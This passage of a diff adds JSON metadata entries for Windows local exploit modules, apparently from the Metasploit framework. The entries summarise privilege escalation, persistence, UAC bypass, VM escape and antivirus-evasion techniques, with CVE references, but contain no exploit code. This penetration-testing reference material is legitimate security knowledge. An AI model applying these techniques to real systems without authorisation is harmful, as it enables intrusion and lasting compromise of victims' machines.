"2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/persistence.rb", + "is_install_path": true, + "ref_name": "windows/local/persistence", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/persistence_image_exec_options": { + "name": "Windows Silent Process Exit Persistence", + "fullname": "exploit/windows/local/persistence_image_exec_options", + "aliases": [], + "rank": 600, + "disclosure_date": "2008-06-28", + "type": "exploit", + "author": [ + "Mithun Shanbhag", + "bwatters-r7" + ], + "description": "Windows allows you to set up a debug process when a process exits.\n This module uploads a payload and declares that it is the debug\n process to launch when a specified process exits.", + "references": [ + "URL-https://attack.mitre.org/techniques/T1183/", + "URL-https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/persistence_image_exec_options.rb", + "is_install_path": true, + "ref_name": "windows/local/persistence_image_exec_options", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/persistence_service": { + "name": "Windows Persistent Service Installer", + "fullname": "exploit/windows/local/persistence_service", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-10-20", + "type": "exploit", + "author": [ + "Green-m " + ], + "description": "This Module will generate and upload an executable to a remote host, next will make it a persistent service.\n It will create a new service which will start the payload whenever the service is running. Admin or system\n privilege is required.", + "references": [ + "URL-https://github.com/rapid7/metasploit-framework/blob/master/external/source/metsvc/src/metsvc.cpp" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/persistence_service.rb", + "is_install_path": true, + "ref_name": "windows/local/persistence_service", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/plantronics_hub_spokesupdateservice_privesc": { + "name": "Plantronics Hub SpokesUpdateService Privilege Escalation", + "fullname": "exploit/windows/local/plantronics_hub_spokesupdateservice_privesc", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-08-30", + "type": "exploit", + "author": [ + "Markus Krell", + "bcoles " + ], + "description": "The Plantronics Hub client application for Windows makes use of an\n automatic update service `SpokesUpdateService.exe` which automatically\n executes a file specified in the `MajorUpgrade.config` configuration\n file as SYSTEM. The configuration file is writable by all users by default.\n\n This module has been tested successfully on Plantronics Hub version 3.13.2\n on Windows 7 SP1 (x64).", + "references": [ + "CVE-2019-15742", + "EDB-47845", + "URL-https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/plantronics_hub_spokesupdateservice_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/powershell_cmd_upgrade": { + "name": "Windows Command Shell Upgrade (Powershell)", + "fullname": "exploit/windows/local/powershell_cmd_upgrade", + "aliases": [], + "rank": 600, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "Ben Campbell " + ], + "description": "This module executes Powershell to upgrade a Windows Shell session\n to a full Meterpreter session.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/local/powershell_cmd_upgrade.rb", + "is_install_path": true, + "ref_name": "windows/local/powershell_cmd_upgrade", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/powershell_remoting": { + "name": "Powershell Remoting Remote Command Execution", + "fullname": "exploit/windows/local/powershell_remoting", + "aliases": [], + "rank": 600, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "Ben Campbell " + ], + "description": "This module uses Powershell Remoting (TCP 47001) to inject payloads on target machines.\n If RHOSTS are specified, it will try to resolve the IPs to hostnames, otherwise\n use a HOSTFILE to supply a list of known hostnames.", + "references": [ + "CVE-1999-0504", + "OSVDB-3106" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/exploits/windows/local/powershell_remoting.rb", + "is_install_path": true, + "ref_name": "windows/local/powershell_remoting", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ppr_flatten_rec": { + "name": "Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation", + "fullname": "exploit/windows/local/ppr_flatten_rec", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-05-15", + "type": "exploit", + "author": [ + "Tavis Ormandy ", + "progmboy ", + "Keebie4e", + "egypt ", + "sinn3r ", + "Ben Campbell ", + "juan vazquez ", + "OJ Reeves" + ], + "description": "This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage\n of uninitialized data which allows to corrupt memory. At the moment, the module has\n been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.", + "references": [ + "CVE-2013-3660", + "EDB-25912", + "OSVDB-93539", + "MSB-MS13-053", + "URL-https://seclists.org/fulldisclosure/2013/May/91" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ppr_flatten_rec.rb", + "is_install_path": true, + "ref_name": "windows/local/ppr_flatten_rec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ps_persist": { + "name": "Powershell Payload Execution", + "fullname": "exploit/windows/local/ps_persist", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-08-14", + "type": "exploit", + "author": [ + "RageLtMan ", + "Matt \"hostess\" Andreko" + ], + "description": "This module generates a dynamic executable on the session host using .NET templates.\n Code is pulled from C# templates and impregnated with a payload before being\n sent to a modified PowerShell session with .NET 4 loaded. The compiler builds\n the executable (standard or Windows service) in memory and produces a binary\n which can be started/installed and downloaded for later use. After compilation the\n PoweShell session can also sign the executable if provided a path the a .pfx formatted\n certificate.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ps_persist.rb", + "is_install_path": true, + "ref_name": "windows/local/ps_persist", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ps_wmi_exec": { + "name": "Authenticated WMI Exec via Powershell", + "fullname": "exploit/windows/local/ps_wmi_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-08-19", + "type": "exploit", + "author": [ + "RageLtMan " + ], + "description": "This module uses WMI execution to launch a payload instance on a remote machine.\n In order to avoid AV detection, all execution is performed in memory via psh-net\n encoded payload. Persistence option can be set to keep the payload looping while\n a handler is present to receive it. By default the module runs as the current\n process owner. The module can be configured with credentials for the remote host\n with which to launch the process.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/local/ps_wmi_exec.rb", + "is_install_path": true, + "ref_name": "windows/local/ps_wmi_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/pxeexploit": { + "name": "PXE Exploit Server", + "fullname": "exploit/windows/local/pxeexploit", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-08-05", + "type": "exploit", + "author": [ + "scriptjunkie" + ], + "description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a linux kernel and initrd into memory that\n reads the hard drive; placing the payload on the hard drive of any Windows\n partition seen.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/exploits/windows/local/pxeexploit.rb", + "is_install_path": true, + "ref_name": "windows/local/pxeexploit", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/local/razer_zwopenprocess": { + "name": "Razer Synapse rzpnk.sys ZwOpenProcess", + "fullname": "exploit/windows/local/razer_zwopenprocess", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-22", + "type": "exploit", + "author": [ + "Spencer McIntyre" + ], + "description": "A vulnerability exists in the latest version of Razer Synapse\n (v2.20.15.1104 as of the day of disclosure) which can be leveraged\n locally by a malicious application to elevate its privileges to those of\n NT_AUTHORITY\\SYSTEM. The vulnerability lies in a specific IOCTL handler\n in the rzpnk.sys driver that passes a PID specified by the user to\n ZwOpenProcess. This can be issued by an application to open a handle to\n an arbitrary process with the necessary privileges to allocate, read and\n write memory in the specified process.\n\n This exploit leverages this vulnerability to open a handle to the\n winlogon process (which runs as NT_AUTHORITY\\SYSTEM) and infect it by\n installing a hook to execute attacker controlled shellcode. This hook is\n then triggered on demand by calling user32!LockWorkStation(), resulting\n in the attacker's payload being executed with the privileges of the\n infected winlogon process. In order for the issued IOCTL to work, the\n RazerIngameEngine.exe process must not be running. This exploit will\n check if it is, and attempt to kill it as necessary.\n\n The vulnerable software can be found here:\n https://www.razerzone.com/synapse/. No Razer hardware needs to be\n connected in order to leverage this vulnerability.\n\n This exploit is not opsec-safe due to the user being logged out as part\n of the exploitation process.", + "references": [ + "CVE-2017-9769", + "URL-https://warroom.securestate.com/cve-2017-9769/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/razer_zwopenprocess.rb", + "is_install_path": true, + "ref_name": "windows/local/razer_zwopenprocess", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/registry_persistence": { + "name": "Windows Registry Only Persistence", + "fullname": "exploit/windows/local/registry_persistence", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-07-01", + "type": "exploit", + "author": [ + "Donny Maasland " + ], + "description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).\n The payload will be installed completely in registry.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/local/registry_persistence.rb", + "is_install_path": true, + "ref_name": "windows/local/registry_persistence", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ricoh_driver_privesc": { + "name": "Ricoh Driver Privilege Escalation", + "fullname": "exploit/windows/local/ricoh_driver_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-01-22", + "type": "exploit", + "author": [ + "Alexander Pudwill", + "Pentagrid AG", + "Shelby Pace" + ], + "description": "Various Ricoh printer drivers allow escalation of\n privileges on Windows systems.\n\n For vulnerable drivers, a low-privileged user can\n read/write files within the `RICOH_DRV` directory\n and its subdirectories.\n\n `PrintIsolationHost.exe`, a Windows process running\n as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n during the installation of a printer. A user can\n elevate to SYSTEM by writing a malicious DLL to\n the vulnerable driver directory and adding a new\n printer with a vulnerable driver.\n\n This module leverages the `prnmngr.vbs` script\n to add and delete printers. Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.", + "references": [ + "CVE-2019-19363", + "URL-https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ricoh_driver_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/ricoh_driver_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "unreliable-session" + ], + "Stability": [ + "service-resource-loss" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/run_as": { + "name": "Windows Run Command As User", + "fullname": "exploit/windows/local/run_as", + "aliases": [], + "rank": 600, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "Kx499", + "Ben Campbell " + ], + "description": "This module will login with the specified username/password and execute the\n supplied command as a hidden process. Output is not returned by default.\n Unless targeting a local user either set the DOMAIN, or specify a UPN user\n format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function.\n\n A custom command line can be sent instead of uploading an executable.\n APPLICAITON_NAME and COMMAND_LINE are passed to lpApplicationName and lpCommandLine\n respectively. See the MSDN documentation for how these two values interact.", + "references": [ + "URL-https://msdn.microsoft.com/en-us/library/windows/desktop/ms682431" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2022-06-29 19:18:47 +0000", + "path": "/modules/exploits/windows/local/run_as.rb", + "is_install_path": true, + "ref_name": "windows/local/run_as", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/s4u_persistence": { + "name": "Windows Manage User Level Persistent Payload Installer", + "fullname": "exploit/windows/local/s4u_persistence", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-01-02", + "type": "exploit", + "author": [ + "Thomas McCarthy \"smilingraccoon\" ", + "Brandon McCann \"zeknox\" " + ], + "description": "Creates a scheduled task that will run using service-for-user (S4U).\n This allows the scheduled task to run even as an unprivileged user\n that is not logged into the device. This will result in lower security\n context, allowing access to local resources only. The module\n requires 'Logon as a batch job' permissions (SeBatchLogonRight).", + "references": [ + "URL-http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/", + "URL-http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/s4u_persistence.rb", + "is_install_path": true, + "ref_name": "windows/local/s4u_persistence", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/service_permissions": { + "name": "Windows Escalate Service Permissions Local Privilege Escalation", + "fullname": "exploit/windows/local/service_permissions", + "aliases": [], + "rank": 500, + "disclosure_date": "2012-10-15", + "type": "exploit", + "author": [ + "scriptjunkie", + "Spencer McIntyre", + "itm4n" + ], + "description": "This module attempts to exploit existing administrative privileges to obtain\n a SYSTEM session. If directly creating a service fails, this module will inspect\n existing services to look for insecure configuration, file or registry permissions that may\n be hijacked. It will then attempt to restart the replaced service to run the\n payload. This will result in a new session when this succeeds.", + "references": [ + "URL-https://itm4n.github.io/windows-registry-rpceptmapper-eop/", + "URL-https://birkep.github.io/posts/Windows-LPE/", + "CVE-2025-21293" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Exploit CVE-2025-21293" + ], + "mod_time": "2025-04-17 09:43:13 +0000", + "path": "/modules/exploits/windows/local/service_permissions.rb", + "is_install_path": true, + "ref_name": "windows/local/service_permissions", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/srclient_dll_hijacking": { + "name": "Windows Server 2012 SrClient DLL hijacking", + "fullname": "exploit/windows/local/srclient_dll_hijacking", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-02-19", + "type": "exploit", + "author": [ + "Erik Wynter" + ], + "description": "All editions of Windows Server 2012 (but not 2012 R2) are vulnerable to DLL\n hijacking due to the way TiWorker.exe will try to call the non-existent\n `SrClient.dll` file when Windows Update checks for updates. This issue can be\n leveraged for privilege escalation if %PATH% includes directories that are\n writable by low-privileged users. The attack can be triggered by any\n low-privileged user and does not require a system reboot.\n\n This module has been successfully tested on Windows Server 2012 (x64).", + "references": [ + "URL-https://blog.vonahi.io/srclient-dll-hijacking" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Server 2012 (x64)" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/local/srclient_dll_hijacking.rb", + "is_install_path": true, + "ref_name": "windows/local/srclient_dll_hijacking", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs", + "screen-effects" + ], + "Reliability": [ + "unreliable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/tokenmagic": { + "name": "Windows Privilege Escalation via TokenMagic (UAC Bypass)", + "fullname": "exploit/windows/local/tokenmagic", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-05-25", + "type": "exploit", + "author": [ + "James Forshaw", + "Ruben Boonen ( ", + "bwatters-r7", + "jheysel-r7" + ], + "description": "This module leverages a UAC bypass (TokenMagic) in order to spawn a process/conduct a DLL\n hijacking attack to gain SYSTEM-level privileges. Windows 7 through Windows 10 1803\n are affected.", + "references": [ + "URL-https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1", + "URL-https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html", + "URL-https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html", + "URL-https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/tokenmagic.rb", + "is_install_path": true, + "ref_name": "windows/local/tokenmagic", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/unquoted_service_path": { + "name": "Windows Unquoted Service Path Privilege Escalation", + "fullname": "exploit/windows/local/unquoted_service_path", + "aliases": [], + "rank": 500, + "disclosure_date": "2001-10-25", + "type": "exploit", + "author": [ + "sinn3r ", + "h00die" + ], + "description": "This module exploits a logic flaw due to how the lpApplicationName parameter\n is handled. When the lpApplicationName contains a space, the file name is\n ambiguous. Take this file path as example: C:\\program files\\hello.exe;\n The Windows API will try to interpret this as two possible paths:\n C:\\program.exe, and C:\\program files\\hello.exe, and then execute all of them.\n To some software developers, this is an unexpected behavior, which becomes a\n security problem if an attacker is able to place a malicious executable in one\n of these unexpected paths, sometimes escalate privileges if run as SYSTEM.\n Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the\n same problem.\n\n The offensive technique is also described in Writing Secure Code (2nd Edition),\n Chapter 23, in the section \"Calling Processes Security\" on page 676.\n\n This technique was previously called Trusted Service Path, but is more commonly\n known as Unquoted Service Path.\n\n The service exploited won't start until the payload written to disk is removed.", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx", + "URL-http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us", + "URL-https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2025-04-13 16:34:03 +0000", + "path": "/modules/exploits/windows/local/unquoted_service_path.rb", + "is_install_path": true, + "ref_name": "windows/local/unquoted_service_path", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "artifacts-on-disk", + "config-changes" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/virtual_box_guest_additions": { + "name": "VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation", + "fullname": "exploit/windows/local/virtual_box_guest_additions", + "aliases": [], + "rank": 200, + "disclosure_date": "2014-07-15", + "type": "exploit", + "author": [ + "Matt Bergin ", + "Jay Smith " + ], + "description": "A vulnerability within the VBoxGuest driver allows an attacker to inject memory they\n control into an arbitrary location they define. This can be used by an attacker to\n overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest\n Additions up to 4.3.10r93012.", + "references": [ + "CVE-2014-2477", + "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/virtual_box_guest_additions.rb", + "is_install_path": true, + "ref_name": "windows/local/virtual_box_guest_additions", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/virtual_box_opengl_escape": { + "name": "VirtualBox 3D Acceleration Virtual Machine Escape", + "fullname": "exploit/windows/local/virtual_box_opengl_escape", + "aliases": [], + "rank": 200, + "disclosure_date": "2014-03-11", + "type": "exploit", + "author": [ + "Francisco Falcon", + "Florian Ledoux", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The\n vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a\n sequence of specially crafted rendering messages, a virtual machine can exploit an out\n of bounds array access to corrupt memory and escape to the host. This module has been\n tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6.", + "references": [ + "CVE-2014-0983", + "BID-66133", + "URL-http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities", + "URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/virtual_box_opengl_escape.rb", + "is_install_path": true, + "ref_name": "windows/local/virtual_box_opengl_escape", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/vss_persistence": { + "name": "Persistent Payload in Windows Volume Shadow Copy", + "fullname": "exploit/windows/local/vss_persistence", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-10-21", + "type": "exploit", + "author": [ + "Jedediah Rodriguez " + ], + "description": "This module will attempt to create a persistent payload in a new volume shadow copy. This is\n based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has\n been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY\n option, the user should need password in order to start session on the target machine.", + "references": [ + "URL-https://web.archive.org/web/20201111212952/https://securityweekly.com/2011/11/02/safely-dumping-hashes-from-liv/", + "URL-http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Windows" + ], + "mod_time": "2022-10-01 17:54:59 +0000", + "path": "/modules/exploits/windows/local/vss_persistence.rb", + "is_install_path": true, + "ref_name": "windows/local/vss_persistence", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "config-changes" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/webexec": { + "name": "WebEx Local Service Permissions Exploit", + "fullname": "exploit/windows/local/webexec", + "aliases": [], + "rank": 400, + "disclosure_date": "2018-10-09", + "type": "exploit", + "author": [ + "Jeff McJunkin " + ], + "description": "This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM,\n can be used to run arbitrary commands locally, and can be started by limited users in\n default installations.", + "references": [ + "URL-https://webexec.org", + "CVE-2018-15442" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows x86", + "Windows x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/local/webexec.rb", + "is_install_path": true, + "ref_name": "windows/local/webexec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/win_error_cve_2023_36874": { + "name": "Microsoft Error Reporting Local Privilege Elevation Vulnerability", + "fullname": "exploit/windows/local/win_error_cve_2023_36874", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-07-11", + "type": "exploit", + "author": [ + "Filip Dragović (Wh04m1001)", + "Octoberfest7", + "bwatters-r7" + ], + "description": "This module takes advantage of a bug in the way Windows error reporting opens the report\n parser. If you open a report, Windows uses a relative path to locate the rendering program.\n By creating a specific alternate directory structure, we can coerce Windows into opening an\n arbitrary executable as SYSTEM.\n If the current user is a local admin, the system will attempt impersonation and the exploit will\n fail.", + "references": [ + "CVE-2023-36874", + "URL-https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/", + "URL-https://github.com/Wh04m1001/CVE-2023-36874", + "URL-https://github.com/Octoberfest7/CVE-2023-36874_BOF" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-09-27 09:43:32 +0000", + "path": "/modules/exploits/windows/local/win_error_cve_2023_36874.rb", + "is_install_path": true, + "ref_name": "windows/local/win_error_cve_2023_36874", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/windscribe_windscribeservice_priv_esc": { + "name": "Windscribe WindscribeService Named Pipe Privilege Escalation", + "fullname": "exploit/windows/local/windscribe_windscribeservice_priv_esc", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-05-24", + "type": "exploit", + "author": [ + "Emin Ghuliev", + "bcoles " + ], + "description": "The Windscribe VPN client application for Windows makes use of a\n Windows service `WindscribeService.exe` which exposes a named pipe\n `\\.\\pipe\\WindscribeService` allowing execution of programs with\n elevated privileges.\n\n Windscribe versions prior to 1.82 do not validate user-supplied\n program names, allowing execution of arbitrary commands as SYSTEM.\n\n This module has been tested successfully on Windscribe versions\n 1.80 and 1.81 on Windows 7 SP1 (x64).", + "references": [ + "CVE-2018-11479", + "URL-http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html", + 